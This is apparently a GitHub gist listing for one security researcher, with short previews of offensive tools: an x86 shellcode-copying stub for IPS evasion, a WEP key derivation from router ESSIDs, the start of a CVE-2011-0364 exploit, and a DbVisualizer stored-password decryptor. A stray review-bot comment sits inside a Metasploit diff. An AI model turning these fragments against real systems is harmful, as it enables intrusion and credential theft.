Gerry Eisenhaur gerry

gerry /
Created Apr 18, 2010
collection of various IPS evasions
import struct

# `scode` is the payload buffer this header copies; it is defined earlier in
# the gist and is not shown in this preview.
offset = 0x1000 - len(scode) - 32
tls_header = "\xE8\x00\x00\x00\x00" # CALL $+5
tls_header += "\x5E" # POP ESI
tls_header += "\x83\xC6\x1B" # ADD ESI, 0x1b
tls_header += "\xB9" + struct.pack("<L", len(scode)) # MOV ECX, len(scode)
tls_header += "\x64\x8B\x3D\x30\x00\x00\x00" # MOV EDI, DWORD PTR FS:[0x30]
tls_header += "\x81\xC7" + struct.pack("<L", offset) # ADD EDI, offset
tls_header += "\x57" # PUSH EDI
tls_header += "\xFC" # CLD
tls_header += "\xF3\xA4" # REP MOVSB [EDI], [ESI]
# Calculate the lower 6 bytes of the WEP key, the upper 4 are from the MAC
# address of the router (1801 or 1F90)
def get_key(essid):
    # Treat the ESSID as a base-36 number, least significant digit first
    key = sum(int(val, 36) * (36**idx) for idx, val in enumerate(essid))
    return hex(key)

# >>> print get_key("E3X12")
# 0x349fca
gerry /
Last active Apr 8, 2020
Extracts the embedded source code from Cisco Security Agent Management Console.
#!/usr/bin/env python
""", Extracts the embedded source code from Cisco Security Agent Management Console.
Gerry <>
import os
import sys
import struct
import pefile
from itertools import takewhile
gerry / XSS Dump
Created Jan 5, 2011
Collection of random web bugs (mainly XSS)
gerry /
Last active Aug 23, 2016
Exploit for CVE-2011-0364
#!/usr/bin/env python
# Thu 24 Jun 2010 04:20:52 AM EDT
import httplib
import mimetools
import StringIO
_boundary = mimetools.choose_boundary()
_host_uid = 'C087EFAE-05A2-4A0B-9512-E05E5ED84AEB'
_csamc = ""
gerry / msf-rex.gemspec
Created Nov 8, 2011 — forked from emonti/msf-rex.gemspec
gemspec to get a ruby gem out of lib/rex in the metasploit framework
# Drop this into msf3 root-dir as 'msf-rex.gemspec'.
# Create gem with:
# $ gem build msf-rex.gemspec
# Note there's already a "rex" rubygem, which is why we used 'msf-rex'.
# We can still "require 'rex'" though.
$: << 'lib'
gerry / import_nessus_nbe.diff
Created Feb 27, 2013
Quick fix for importing Nessus NBE files
diff --git a/lib/msf/core/db.rb b/lib/msf/core/db.rb
index 7e0bc73..9b5c8d8 100644
--- a/lib/msf/core/db.rb
+++ b/lib/msf/core/db.rb
@@ -5163,11 +5163,11 @@ class DBManager
# There is no place the NBE actually stores the plugin name used to
# scan. You get "Security Note" or "Security Warning," and that's it.
def import_nessus_nbe(args={}, &block)
- data = args[:data]
+ nbe_data = args[:data]
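Review bot: the rename of `data` to `nbe_data` at the top of import_nessus_nbe is only the first line of an eleven-line hunk (`@@ -5163,11 +5163,11 @@`), so every later reference to `data` inside the method has to be updated in the same hunk, or the first remaining use raises NameError for an undefined local. The comment above the `def` explains the NBE limitation (no plugin name is stored), but nothing in the hunk records why the variable needed renaming; a short comment or commit message stating what the old name collided with would help the next reader.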
gerry /
Last active Jun 24, 2020
A quick hack to extract and decrypt credentials from DbVisualizer config files.
#!/usr/bin/env python
# ~
# DbVisualizer uses PBEWithMD5AndDES with a static key to store passwords.
# This is a quick hack to extract and decrypt credentials from DbVisualizer config files.
# Tested against DbVisualizer Free 9.0.9 and 9.1.6
[2014-03-25 02:05:30][not-the-sea workspace]$ security/p/gerry/misc/
[+] DbVisualizer Password Extractor and Decryptor (@gerryeisenhaur)
[+] Additional Usage Options:
[+] security/p/gerry/misc/ <config filename>

Keybase proof

I hereby claim:

  • I am gerry on github.
  • I am gerry ( on keybase.
  • I have a public key whose fingerprint is F120 587B A599 B6B6 1ED6 1A37 DD61 36D6 59E5 4DEF

To claim this, I am signing this object:

gerry /
Created Apr 29, 2015
Respond to and record dns lookups.
#!/usr/bin/env python
import sys
import random
import string
import datetime
import itertools
import threading
import traceback
import SocketServer
import operator as op